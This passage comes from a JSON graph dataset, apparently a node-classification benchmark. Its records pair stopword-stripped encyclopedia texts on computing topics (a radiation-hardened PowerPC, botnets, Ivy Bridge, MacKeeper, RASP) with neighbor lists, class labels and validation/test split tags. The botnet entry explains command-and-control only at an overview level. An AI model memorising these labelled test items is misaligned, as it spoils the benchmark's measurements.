    "text": "RHPPC:rhppc rhppc radiation hardened processor based powerpc 603e technology licensed motorola freescale manufactured honeywell rhppc equivalent commercial powerpc 603e processor minor exceptions phase locked loop pll processor version register pvr rhppc processor compatible powerpc architecture book i-iii powerpc 603e programmers interface also supported common powerpc software tools embedded operating systems like vxworks rhppc processor generates 190 mips dhrystone mix core clock 100 mhz i.e rhppc processor completes 1.9 instructions per cycle rhppc runs 25 33.3 40 50 mhz 60x bus clock sysclk generated based pci clock 60x bus clock de-skewed on-chip pll also multiplied rhppc processor superscalar machine five execution units system register unit integer unit load/store unit floating point unit branch processing unit dispatch unit issue two instructions per cycle floating point unit three level deep pipeline order execution supported use shadow rename registers completion unit complete two instructions per cycle order copying results rename registers real registers independently branch processing unit complete branch cycle thus theory rhppc processor complete three instructions per cycle within rhppc processor 16 kb instruction 16 kb data l1 caches 4 way set associative support write copy-back protocol cache line fixed eight words rhppc processor fabricated honeywell ’ soi-v 0.35 µm four level metal process standard cells custom drop-ins used packaged hermetic aluminium oxide 21 x 21 mm grid array package 255 16 x 16 leads leads 1.27 mm centers lead either solder balls solder columns short pins attached standard die attach wire bond die interconnect used",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      5642,
      1548,
      1933,
      6926,
      3472,
      1563,
      1309,
      8606,
      6815,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      1461,
      8120,
      9020,
      1725,
      1983,
      10180,
      8530,
      3540,
      342,
      9302,
      7514,
      11613,
      6878,
      1635,
      10214,
      10985,
      10734,
      3185,
      4465,
      4211,
      5235,
      8058,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4882,
    "label": 4,
    "text": "Void_pantograph:void pantograph security printing void pantograph refers method making copy-evident tamper-resistant patterns background document normally invisible eye become obvious document photocopied typically spell void copy invalid indicator message void pantographs work exploiting limitations features copying equipment scanner photocopier act low-pass filter original image blurring edges slightly also perfectly aligned directions document causing aliasing features smaller resolution also reproduced addition human vision sensitive luminance contrast ratio means grey region consists grid small dark dots filtering produce lighter grey region larger dots affected differently big-dot-little-dot makes possible see pattern invisible numerous variations exist including printing marks using raster lines one direction background lines another direction using fine line patterns alias visible moire pattern copied",
    "neighbors": [
      10163,
      6324
    ],
    "mask": "Test"
  },
  {
    "node_id": 4883,
    "label": 4,
    "text": "Botnet:botnet botnet number internet-connected devices running one bots botnets used perform distributed denial-of-service attack ddos attack steal data send spam allows attacker access device connection owner control botnet using command control c c software word botnet combination words robot network term usually used negative malicious connotation botnet logical collection internet-connected devices computers smartphones iot devices whose security breached control ceded third party compromised device known bot created device penetrated software malware malicious software distribution controller botnet able direct activities compromised computers communication channels formed standards-based network protocols irc hypertext transfer protocol http botnets increasingly rented cyber criminals commodities variety purposes botnet architecture evolved time effort evade detection disruption traditionally bot programs constructed clients communicate via existing servers allows bot herder person controlling botnet perform control remote location obfuscates traffic many recent botnets rely existing peer-to-peer networks communicate p2p bot programs perform actions client-server model require central server communicate first botnets internet used client-server model accomplish tasks typically botnets operate internet relay chat networks domains websites infected clients access predetermined location await incoming commands server bot herder sends commands server relays clients clients execute commands report results back bot herder case irc botnets infected clients connect infected irc server join channel pre-designated c c bot herder bot herder sends commands channel via irc server client retrieves commands executes clients send messages back irc channel results actions response efforts detect decapitate irc botnets bot herders begun deploying malware peer-to-peer networks bots may use digital signatures someone access private key control botnet see e.g gameover zeus zeroaccess botnet newer botnets fully operate p2p networks rather communicate centralized server p2p bots perform command distribution server client receives commands avoids single point failure issue centralized botnets order find infected machines bot discreetly probes random ip addresses contacts another infected machine contacted bot replies information software version list known bots one bots version lower initiate file transfer update way bot grows list infected machines updates periodically communicating known bots botnet originator known bot herder bot master controls botnet remotely known command-and-control c c program operation must communicate via covert channel client victim machine zombie computer irc historically favored means c c communication protocol bot herder creates irc channel infected clients join messages sent channel broadcast channel members bot herder may set channel topic command botnet e.g message codice_1 bot herder alerts infected clients belonging channel begin ddos attack website www.victim.com example response codice_2 bot client alerts bot herder begun attack botnets implement custom versions well-known protocols implementation differences used detection botnets example mega-d features slightly modified smtp implementation testing spam capability bringing mega-d smtp server disables entire pool bots rely upon smtp server computer science zombie computer computer connected internet compromised hacker computer virus trojan horse used perform malicious tasks one sort another remote direction botnets zombie computers often used spread e-mail spam launch denial-of-service attacks owners zombie computers unaware system used way owner tends unaware computers metaphorically compared zombies coordinated ddos attack multiple botnet machines also resembles zombie horde attack many computer users unaware computer infected bots process stealing computing resources result system joined botnet sometimes referred scrumping botnet command control c c protocols implemented number ways traditional irc approaches sophisticated versions telnet botnets use simple c c botnet protocol bots connect main command server host botnet bots added botnet using scanning script scanning script run external server scans ip ranges telnet ssh server default logins login found added infection list infected malicious infection line via ssh scanner server ssh command run infects server commands server ping control server becomes slave malicious code infecting servers infected server bot controller launch ddos attacks high volume using c c panel host server types botnets used take large websites like xbox playstation network known hacking group called lizard squad irc networks use simple low bandwidth communication methods making widely used host botnets tend relatively simple construction used moderate success coordinating ddos attacks spam campaigns able continually switch channels avoid taken however cases merely blocking certain keywords proven effective stopping irc-based botnets rfc 1459 irc standard popular botnets first known popular botnet controller script maxite bot using irc xdcc protocol private control commands one problem using irc bot client must know irc server port channel use botnet anti-malware organizations detect shut servers channels effectively halting botnet attack happens clients still infected typically lie dormant since way receiving instructions mitigate problem botnet consist several servers channels one servers channels becomes disabled botnet simply switches another still possible detect disrupt additional botnet servers channels sniffing irc traffic botnet adversary even potentially gain knowledge control scheme imitate bot herder issuing commands correctly since botnets using irc networks domains taken time hackers moved p2p botnets c c way make harder taken also used encryption way secure lock botnet others time use encryption public-key cryptography presented challenges implementing breaking many large botnets tend use domains rather irc construction see rustock botnet srizbi botnet usually hosted bulletproof hosting services one earliest types c c zombie computer accesses specially-designed webpage domain serves list controlling commands advantages using web pages domains c c large botnet effectively controlled maintained simple code readily updated disadvantages using method uses considerable amount bandwidth large scale domains quickly seized government agencies without much trouble effort domains controlling botnets seized also easy targets compromise denial-of-service attacks fast-flux dns used way make difficult track control servers may change day day control servers may also hop dns domain dns domain domain generation algorithms used create new dns names controller servers botnets use free dns hosting services dyndns.org no-ip.com afraid.org point subdomain towards irc server harbors bots free dns services host attacks provide reference points often hard-coded botnet executable removing services cripple entire botnet calling back large social media sites github twitter reddit instagram xmpp open source instant message protocol tor hidden services popular ways avoiding egress filtering communicate c c server example illustrates botnet created used malicious gain newer bots automatically scan environment propagate using vulnerabilities weak passwords generally vulnerabilities bot scan propagate valuable becomes botnet controller community computers co-opted botnet execute malicious software accomplished luring users making drive-by download exploiting web browser vulnerabilities tricking user running trojan horse program may come email attachment malware typically install modules allow computer commanded controlled botnet operator software downloaded call home send reconnection packet host computer re-connection made depending written trojan may delete may remain present update maintain modules cases botnet may temporarily created volunteer hacktivists implementations low orbit ion cannon used 4chan members project chanology 2010 china great cannon china allows modification legitimate web browsing traffic internet backbones china create large ephemeral botnet attack large targets github 2015 botnet controller community features constant continuous struggle bots highest overall bandwidth high-quality infected machines like university corporate even government machines botnets often named malware created multiple botnets typically use malware operated different entities botnets used many electronic scams botnets used distribute malware viruses take control regular users computer/software taking control someone personal computer unlimited access personal information including passwords login information accounts called phishing phishing acquiring login information victim accounts link victim clicks sent email text survey verizon found around two-thirds electronic espionage cases come phishing geographic dispersal botnets means recruit must individually identified/corralled/repaired limits benefits filtering computer security experts succeeded destroying subverting malware command control networks among means seizing servers getting cut internet denying access domains due used malware contact c c infrastructure cases breaking c c network response c c operators resorted using techniques overlaying c c networks existing benign infrastructure irc tor using peer-to-peer networking systems dependent fixed servers using public key encryption defeat attempts break spoof network norton antibot aimed consumers target enterprises and/or isps host-based techniques use heuristics identify bot behavior bypassed conventional anti-virus software network-based approaches tend use techniques described shutting c c servers null-routing dns entries completely shutting irc servers bothunter software developed support u.s. army research office detects botnet activity within network analyzing network traffic comparing patterns characteristic malicious processes researchers sandia national laboratories analyzing botnets behavior simultaneously running one million linux kernels—a similar scale botnet—as virtual machines 4,480-node high-performance computer cluster emulate large network allowing watch botnets work experiment ways stop detecting automated bot attacks becoming difficult day newer sophisticated generations bots getting launched attackers example automated attack deploy large bot army apply brute-force methods highly accurate username password lists hack accounts idea overwhelm sites tens thousands requests different ips world bot submitting single request every 10 minutes result 5 million attempts per day cases many tools try leverage volumetric detection automated bot attacks ways circumventing triggers volumetric detection one techniques detecting bot attacks known signature-based systems software attempt detect patterns request packet attacks constantly evolving may viable option patterns ca n't discerned thousands requests also behavioral approach thwarting bots ultimately trying distinguish bots humans identifying non-human behavior recognizing known bot behavior process applied user browser network levels capable method using software combat virus utilize honeypot software order convince malware system vulnerable malicious files analyzed using forensic software july 15 2014 subcommittee crime terrorism committee judiciary united states senate held hearing threats posed botnets public private efforts disrupt dismantle first botnet first acknowledged exposed earthlink lawsuit notorious spammer khan c. smith 2001 purpose bulk spam accounting nearly 25 spam time around 2006 thwart detection botnets scaling back size",
    "neighbors": [
      3072,
      10242,
      5636,
      1541,
      10245,
      10756,
      5131,
      9227,
      9233,
      535,
      9242,
      9761,
      4133,
      4648,
      9256,
      9771,
      46,
      10297,
      1083,
      3643,
      7739,
      1087,
      1088,
      9791,
      2114,
      4165,
      10309,
      3145,
      8779,
      5199,
      81,
      4689,
      8789,
      10331,
      9824,
      6241,
      2147,
      10852,
      1125,
      2661,
      6762,
      107,
      6262,
      10875,
      5245,
      9855,
      6786,
      1667,
      5251,
      5764,
      3724,
      9356,
      4245,
      10903,
      10392,
      1690,
      157,
      2717,
      5281,
      2213,
      9909,
      4793,
      4797,
      8387,
      10437,
      10952,
      4813,
      10457,
      3290,
      4314,
      8413,
      3807,
      2275,
      10477,
      9460,
      4344,
      3320,
      10490,
      5886,
      1279,
      4863,
      4356,
      6916,
      7441,
      8978,
      1299,
      3347,
      2325,
      278,
      793,
      6938,
      3867,
      5405,
      8998,
      2857,
      300,
      1337,
      827,
      7996,
      4414,
      11583,
      9536,
      3395,
      4421,
      2887,
      4945,
      3924,
      7515,
      4956,
      3423,
      1888,
      8032,
      7522,
      1892,
      3941,
      11621,
      2409,
      877,
      4462,
      9591,
      7037,
      10110,
      9087,
      2947,
      7044,
      901,
      8580,
      8583,
      7564,
      9102,
      3996,
      10141,
      9630,
      5025,
      10657,
      939,
      1965,
      1970,
      3508,
      4023,
      1979,
      4027,
      6588,
      6080,
      9664,
      9154,
      8133,
      2508,
      4556,
      11221,
      3030,
      4054,
      3032,
      8664,
      988,
      10207,
      2018,
      3555,
      8674,
      9187,
      4584,
      4585,
      4083,
      2041,
      3581,
      2558,
      9727
    ],
    "mask": "None"
  },
  {
    "node_id": 4884,
    "label": 2,
    "text": "Intel_Memory_Model:intel memory model computing intel memory model refers set six different memory models x86 cpu operating real mode control segment registers used default size pointers four registers used refer four segments 16-bit x86 segmented memory architecture ds data segment cs code segment ss stack segment es extra segment another 16-bit register act offset given segment logical address platform written segment offset typically hexadecimal notation real mode order calculate physical address byte memory hardware shifts contents appropriate segment register 4 bits left effectively multiplying 16 adds offset example logical address 7522 f139 yields 20-bit physical address note process leads aliasing memory given physical address may multiple logical representations means comparison pointers different segments complicated process pointer formats known near far huge memory models protected mode segment writable executable therefore implementing tiny memory model code segment register must point physical address limit data segment register defeated one features 80286 makes sure data segments never executable code segments never writable means self-modifying code never allowed however 80386 paged memory management unit possible protect individual memory pages writing memory models limited 16-bit programs possible use segmentation 32-bit protected mode well resulting 48-bit pointers exist c language compilers support however segmentation 32-bit mode allow access larger address space single segment would cover unless segments always present memory linear address space used cache larger segmented virtual space allows better protection access various objects areas 1 mb long benefit one-byte access protection granularity versus coarse 4 kib granularity offered sole paging therefore used specialized applications like telecommunications software technically flat 32-bit address space tiny memory model segmented address space reigns four segment registers contain one value x86-64 platform total seven memory models exist majority symbol references 32 bits wide addresses known link time opposed position-independent code affect pointers used always flat 64-bit pointers values accessed via symbols placed",
    "neighbors": [
      4424,
      5065,
      9911,
      5356,
      5040,
      499,
      6868,
      5911,
      5080,
      3386,
      1915,
      7421,
      1247
    ],
    "mask": "Test"
  },
  {
    "node_id": 4885,
    "label": 9,
    "text": "LabWindows/CVI:labwindows/cvi labwindows/cvi cvi short c virtual instrumentation ansi c programming environment test measurement developed national instruments program originally released labwindows dos 1987 soon revisioned renamed microsoft windows platform current version labwindows/cvi commonly referred cvi 2019 labwindows/cvi uses libraries data-acquisition modules better known national instrument product labview thus highly compatible labview targeted domain experts scientists cvi towards software engineers comfortable text-based linear languages c. starting labview 8.0 major versions released around first week august coincide annual national instruments conference ni week followed bug-fix release following february 2009 national instruments started name releases year released bug-fix called service pack instance 2009 service pack 1 released february 2010",
    "neighbors": [
      6338,
      6154,
      6797,
      7341,
      303,
      7983,
      10478,
      7355,
      2045,
      6910
    ],
    "mask": "None"
  },
  {
    "node_id": 4886,
    "label": 3,
    "text": "Ivy_Bridge_(microarchitecture):ivy bridge microarchitecture ivy bridge codename third generation intel core processors core i7 i5 i3 ivy bridge die shrink 22 nanometer manufacturing process based 32 nanometer sandy bridge second generation intel core see tick–tock model name also applied broadly 22 nm die shrink sandy bridge microarchitecture based finfet 3d tri-gate transistors also used xeon core i7 ivy bridge-ex ivytown ivy bridge-ep ivy bridge-e microprocessors released 2013 ivy bridge processors backwards compatible sandy bridge platform systems might require firmware update vendor specific 2011 intel released 7-series panther point chipsets integrated usb 3.0 complement ivy bridge volume production ivy bridge chips began third quarter 2011 quad-core dual-core-mobile models launched april 29 2012 may 31 2012 respectively core i3 desktop processors well first 22 nm pentium announced available first week september 2012 ivy bridge earliest intel microarchitecture officially support windows 10 64-bit ivy bridge cpu microarchitecture shrink sandy bridge remains largely unchanged like predecessor sandy bridge ivy bridge also primarily developed intel israel branch located haifa israel notable improvements include mobile desktop ivy bridge chips also include significant changes sandy bridge compared predecessor sandy bridge ivy bridge temperatures reportedly 10 °c higher compared sandy bridge cpu overclocked even default voltage setting impress pc watch japanese website performed experiments confirmed earlier speculations intel used poor quality perhaps lower cost thermal interface material thermal paste tim chip heat spreader instead fluxless solder previous generations mobile ivy bridge processors affected issue use heat spreader chip cooling system enthusiast reports describe tim used intel low-quality par premium cpu speculation design encourage sales prior processors analyses caution processor damaged void warranty home users attempt remedy matter tim much lower thermal conductivity causing heat trap die experiments replacing tim higher-quality one heat removal methods showed substantial temperature drop improvements increased voltages overclocking sustainable ivy bridge chips intel claims smaller die ivy bridge related increase thermal density expected result higher temperatures cpu overclocked intel also stated expected likely improve future revisions ivy bridge processors one two four cores report cpuid model 0x000306a9 built four different configurations differing number cores l3 cache gpu execution units ivy bridge-e family follow-up sandy bridge-e using cpu core ivy bridge processor lga 2011 lga 1356 lga 2011-1 packages workstations servers ivy bridge-e family made three different versions number cores three market segments basic ivy bridge-e single-socket processor sold core i7-49xx available six-core s1 stepping versions limited four active cores ivy bridge-en xeon e5-14xx v2 xeon e5-24xx v2 model single- dual-socket servers using lga 1356 10 cores ivy bridge-ep xeon e5-16xx v2 xeon e5-26xx v2 xeon e5-46xx v2 scales four lga 2011 sockets 12 cores per chip fact three die flavors ivy bridge-ep meaning manufactured organized differently according number cores ivy bridge-ep cpu includes ivy bridge-ex 15 cores scales 8 sockets 15-core die organized three columns five cores three interconnect rings connecting two columns per ring five-core column separate l3 cache processor supposed new run sure technology speculated odd number cores involve keeping one reserve processors featuring intel hd 4000 graphics hd p4000 xeon set bold processors feature hd 2500 graphics hd graphics unless indicated n/a list announced desktop processors follows suffixes denote additional high-end server processors based ivy bridge architecture code named ivytown announced september 10 2013 intel developer forum usual one year interval consumer server product releases ivy bridge-ep processor line announced september 2013 12 cores 30 mb third level cache rumors ivy bridge-ex 15 cores increased third level cache 37.5 mb although early leaked lineup ivy bridge-e included processors maximum 6 cores core-i7 xeon versions produced xeon versions marketed xeon e5-1400 v2 act drop-in replacements existing sandy bridge-en based xeon e5 xeon e5-2600 v2 versions act drop-in replacements existing sandy bridge-ep based xeon e5 core-i7 versions designated i7-4820k i7-4930k i7-4960x released september 10 2013 remaining compatible x79 lga 2011 hardware intermediate lga 1356 socket intel launched xeon e5-2400 v2 codenamed ivy bridge-en series january 2014 10 cores new ivy bridge-ex line marketed xeon e7 v2 corresponding predecessor using sandy bridge microarchitecture instead followed older westmere-ex processors suffixes denote intel demonstrated haswell architecture september 2011 began release 2013 successor sandy bridge ivy bridge",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      6926,
      8719,
      5649,
      7313,
      5523,
      6804,
      8851,
      8855,
      3352,
      9111,
      9369,
      5883,
      10658,
      1832,
      2088,
      10669,
      2094,
      2350,
      9391,
      7601,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      6463,
      8125,
      833,
      8126,
      6339,
      5444,
      9541,
      8394,
      1998,
      2638,
      977,
      5073,
      2516,
      597,
      5844,
      4695,
      9945,
      10715,
      7134,
      1119,
      5606,
      7783,
      1000,
      7657,
      1260,
      4204,
      4334,
      5356,
      5871,
      8684,
      9582,
      499,
      8820,
      3317,
      8438,
      10734,
      4217,
      4603,
      10620,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 4887,
    "label": 3,
    "text": "Bodhi_Linux:bodhi linux bodhi linux lightweight linux distribution based ubuntu uses moksha window manager philosophy distribution provide minimal base system users populate software want thus default includes software essential linux users including file browser pcmanfm web browser midori terminal emulator terminology include software features developers deem unnecessary make populating systems software easy bodhi linux developers maintain online database lightweight software installed one click via apturl addition standard version bodhi linux intel-compatible processors alpha release version tablet devices arm processors based debian tablet device version bodhi officially supported anymore amount time needed keep date package image updates rarely made future system requirements include 256 mb ram 4 gb hard disk space 500 mhz processor 32 bit processors without pae capability supported terms pae-enabled ones difference bodhi versions older kernel used using enlightenment dr17-based fork called moksha desktop bodhi provides rich desktop effects animations require high end computer hardware rationale forking project dr17 due established performance functionality e19 possessed optimizations break existing features users enjoy use per jeff hoogland statement enlightenment window manager well tools developed specifically bodhi linux written c programming language python bodhi linux derived ubuntu long term support releases 14.04 16.04 18.04 ... support follows pattern security bug fixes released daily basis throughout five-year period opposed ubuntu bodhi short term support installed bodhi linux upgraded latest state via command line package manager releases numbered x.y.z major release x.y.z e.g version 2.y.z 3.0.0 follows ubuntu long term support delay months goal deliver new major release july every year following new ubuntu lts expected april new functionality added release bodhi linux 3.0.0 branch released february 2015 additional legacy version older hardware update/point release x.y.z e.g version 2.3.z 2.4.0 similar point releases ubuntu 12.04.1 12.04.2 ... frequent used delivering new software versions improvements related security beginning version 2.4.0 update frequency reduced three times year every four months january may september new update come bodhi linux 2.4.0 planned release august 2013 appeared little late mid-september ready bug fix release x.y.z e.g version 2.4.0 2.4.1 meant correcting errors default configuration r_pi bodhi linux build built directly top raspbian incorporates changes improvements produce optimized ″hard float″ code raspberry pi armhf arm hf technically r_pi bodhi linux built compilation settings adjusted produce optimized ″hard float″ code raspberry pi armhf arm hf hard float application binary interface arm11 32-bit risc microprocessor arm architecture armv6 architectural additions provides enormous performance gains many use cases however required significant effort port elements debian wheezy armv6 cpu official builds require armv7 significantly enhance performance applications make heavy use floating point arithmetic operations previous less efficient soft float settings native armv6 architecture floating point arithmetic operations simulated software effort build working release armhf release officially supported anymore moment jack germain linuxinsider wrote positive review bodhi linux 5.0.0 noting bodhi linux elegant lightweight distribution productive computing platform",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      3649,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      659,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      9391,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      9921,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      5356,
      6380,
      9964,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      5380,
      7435,
      2321,
      5397,
      6934,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      823,
      1849,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      8554,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4888,
    "label": 2,
    "text": "HomeKit:homekit homekit software framework apple lets users set ios device configure communicate control smart-home appliances designing rooms items actions homekit service users enable automatic actions house simple voice dictation siri apps homekit first released ios 8 september 2014 homekit support also included macos mojave used devices siri manufacturers homekit-enabled devices required mfi program homekit products required encryption co-processor later changed ios 11 added support software authentication equipment manufactured without homekit support enabled use gateway product hub connects devices homekit service",
    "neighbors": [
      10755,
      9732,
      4615,
      1549,
      5647,
      7697,
      1042,
      11289,
      6186,
      4139,
      6700,
      3629,
      4657,
      1074,
      8754,
      9784,
      8253,
      576,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      3672,
      4184,
      10838,
      2141,
      4702,
      3681,
      9826,
      2149,
      5733,
      8806,
      3691,
      8303,
      2673,
      6771,
      2676,
      6264,
      7292,
      2686,
      6783,
      7806,
      9343,
      10878,
      3719,
      10888,
      8842,
      11402,
      10897,
      1686,
      7318,
      5784,
      1177,
      4251,
      3228,
      2207,
      1699,
      11430,
      171,
      5292,
      8877,
      1710,
      2735,
      3248,
      3766,
      2232,
      4283,
      3772,
      7869,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      7378,
      3286,
      9430,
      3289,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      2288,
      7928,
      8441,
      7420,
      7422,
      11521,
      2819,
      1796,
      1290,
      3338,
      9999,
      784,
      10512,
      10517,
      5912,
      11037,
      10023,
      811,
      3371,
      4399,
      7983,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      4933,
      838,
      7496,
      9035,
      2388,
      1878,
      4957,
      6495,
      9063,
      4457,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6539,
      7052,
      9100,
      1428,
      9109,
      3483,
      1439,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      6093,
      7118,
      464,
      6608,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      10221,
      7154,
      5619,
      11257,
      7163,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 4889,
    "label": 4,
    "text": "Zeobit:zeobit zeobit llc stylized zeobit technology software company formed 2009 ceo slava kolomiychuk located sunnyvale california company specialized computer security software internet security december 2016 longer business zeobit best known bundled utility software mackeeper software received mixed reviews reviewers divided effectiveness product zeobit llc incorporated september 2009 us state california slava kolomiychuk zeobit management headquarters sunnyvale california partnership offices europe asia house developers customer support march 2010 first product mackeeper macos released september 2010 pckeeper microsoft windows released may 13 2010 first beta version mackeeper version 0.8 released october 4 2010 pckeeper mackeeper equivalent windows pcs version 1.1.48 released october 26 2010 zeobit released mackeeper 1.0 january 30 2012 mackeeper 2.0 released updates security data control cleaning optimization 2014 pennsylvania woman filed class action lawsuit zeobit llc claiming company computer security program identifies problems n't exist generates false error messages scare users purchasing upgrade see holly yencha et al v. zeobit llc case 2:13-cv-00578 u.s. district court western district pennsylvania according complaint filed us district court installed mackeeper prompts user conduct diagnostic scan mackeeper class action lawsuit says scan purportedly detects errors lead problems identified zeobit marketing materials i.e. performance issues security privacy threats —problems mackeeper supposedly designed fix however zeobit class action lawsuit alleges diagnostic scan completed mackeeper reports identified thousands issues cause computer critical condition trial version mackeeper purports fix limited number issues customers encouraged purchase full registered version security software fully repair computer yencha alleges neither free trial full versions mackeeper perform reliable diagnostic testing computer instead zeobit intentionally designed mackeeper invariably ominously report user mac needs repair at-risk due harmful fabricated errors privacy threats computer problems regardless computer actual condition class action lawsuit alleges class action settled 2015 admission wrongdoing customers given refunds mackeeper utility software macos claims provide tools security cleaning optimization data control mackeeper zeobit official sponsors macworld iworld expo san francisco california 2011 2012 acquired kromtech alliance corp may 2013 mackeeper often criticized unethical marketing tactics including pop-up advertising buying domain names similar names antivirus programs zeobit claims affiliates responsible advertising accused unethical mackeeper sometimes referred potentially unwanted program detected antivirus programs pckeeper bundle important system utilities performing different tasks pс antivirus data control optimization tools drive clean-up utilities much according virus bulletin pckeeper scored 91.9 rap test listed number 6 antivirus world acquired kromtech alliance corp may 2013 zeodisk project cloud storage solution also integrated existing zeobit products 2011 zeobit partnered avira integrate virus database technology mackeeper pckeeper internet security features partnership allowed zeobit offer internet security options macos windows linux freebsd openbsd solaris computing platforms zeobit member better business bureau f rating due complaints advertising quality products zeobit microsoft silver certified developer zeobit official opswat partner",
    "neighbors": [
      9771,
      6797,
      3342,
      9488,
      4659,
      2611,
      823,
      1242,
      6683
    ],
    "mask": "Test"
  },
  {
    "node_id": 4890,
    "label": 2,
    "text": "Xiaomi_Mi_A2:xiaomi mi a2 xiaomi mi a2 re-branded xiaomi mi 6x phone co-developed google part android initiative—and xiaomi runs android operating system phone features 5.99 inches full hd+ 1080 x 2160 pixels resolution 403ppi pixel density display unimetal body corning gorilla glass 5 protection powered qualcomm snapdragon 660 processor adreno 512 gpu.and 2.0 type-c 1.0 reversible connector dual rear camera primary camera 12mp sony imx486 sensor 1.25μm pixel size f1.75 aperture secondary 20mp sony imx376 sensor 2.0μm pixel size f1.75 aperture front camera 20mp sony imx 376 sensor 2.0μm pixel size f2.2 aperture battery 3010 mah supports qualcomm quick charge 4.0+ xiaomi mi a2 part android one program software updates provided directly google preinstalled android 8.1.0 oreo board upgraded android 9.0 pie due part android one program mi a2 providing pure/stock android experience ui highly similar google pixel ui xiaomi mi a2 re-branded xiaomi mi 6x phone xiaomi mi 6x first released april 2018 a2 released july 2018",
    "neighbors": [
      10393,
      10658,
      196,
      9863,
      11082,
      5100,
      5755,
      8719,
      1776,
      2259,
      7835,
      9913,
      1400,
      8921,
      8794,
      1083,
      7548,
      10303
    ],
    "mask": "None"
  },
  {
    "node_id": 4891,
    "label": 5,
    "text": "Secure_Neighbor_Discovery:secure neighbor discovery secure neighbor discovery send protocol security extension neighbor discovery protocol ndp ipv6 defined rfc 3971 updated rfc 6494 neighbor discovery protocol ndp responsible ipv6 discovery network nodes local link determine link layer addresses nodes find available routers maintain reachability information paths active neighbor nodes rfc 4861 ndp insecure susceptible malicious interference intent send provide alternate mechanism securing ndp cryptographic method independent ipsec original inherent method securing ipv6 communications send uses cryptographically generated addresses cga new ndp options icmpv6 packet types used ndp send updated use resource public key infrastructure rpki rfc 6494 rfc 6495 define use send certificate profile utilizing modified rfc 6487 rpki certificate profile must include single rfc 3779 ip address delegation extension concerns algorithm agility vis-à-vis attacks hash functions used send expressed rfc 6273 cga currently uses sha-1 hash algorithm pkix certificates provide support alternative hash algorithms",
    "neighbors": [
      5472,
      10144,
      8482,
      6724,
      649,
      3742,
      4687,
      10461,
      5437,
      5470,
      10303
    ],
    "mask": "Test"
  },
  {
    "node_id": 4892,
    "label": 4,
    "text": "Runtime_application_self-protection:runtime application self-protection runtime application self-protection rasp security technology uses runtime instrumentation detect block computer attacks taking advantage information inside running software technology differs perimeter-based protections firewalls detect block attacks using network information without contextual awareness rasp technology said improve security software monitoring inputs blocking could allow attacks protecting runtime environment unwanted changes tampering rasp-protected applications rely less external devices like firewalls provide runtime security protection threat detected rasp prevent exploitation possibly take actions including terminating user session shutting application alerting security personnel sending warning user rasp aims close gap left application security testing network perimeter controls neither enough insight real-time data event flows either prevent vulnerabilities slipping review process block new threats unforeseen development rasp integrated framework module runs conjunction program codes libraries system calls technology also implemented virtualization application security solutions rasp technology used conjunction dynamic application security testing dast technology create interactive application security testing security product rasp solutions deployed two different ways monitor protection mode monitor mode rasp solution reports web application attacks block attack protection mode rasp solution reports blocks web application attacks",
    "neighbors": [
      899,
      5636,
      10756,
      9607,
      9356,
      9488,
      3473,
      8978,
      10392,
      5373,
      5404,
      2975,
      2084,
      2213,
      8998,
      939,
      3629,
      9646,
      3887,
      7855,
      1970,
      5433,
      7739,
      3262,
      9791,
      3525,
      2558,
      7368,
      9160,
      5325,
      2262,
      6360,
      9688,
      7515,
      4956,
      3941,
      6373,
      107,
      11244,
      2041,
      10492,
      5245,
      5246
    ],
    "mask": "Test"
  },
  {
    "node_id": 4893,
    "label": 8,
    "text": "HTTP+HTML_form-based_authentication:http+html form-based authentication http+html form-based authentication typically presently colloquially referred simply form-based authentication technique whereby website uses web form collect subsequently authenticate credential information user agent typically web browser note phrase form-based authentication ambiguous see form-based authentication explanation steps technique http+html form-based authentication arguably prevalent user-authentication technique employed world wide web today approach choice essentially wikis forums banking/financial websites e-commerce websites web search engines web portals common web-server applications popularity apparently due webmasters employers wanting fine-grained control presentation behavior solicitation user credentials default pop-up dialog boxes http basic access authentication digest access authentication many web browsers provide allow precise tailoring desired precision may motivated corporate requirements like branding implementation issues e.g. default configuration web applications like mediawiki phpbb drupal wordpress regardless rationale corporate branding user-experience adjustments must distract several security considerations authentication process",
    "neighbors": [
      225,
      5724,
      3462,
      7965,
      5515,
      10125,
      119,
      5433,
      5435,
      124,
      4797,
      8923,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 4894,
    "label": 3,
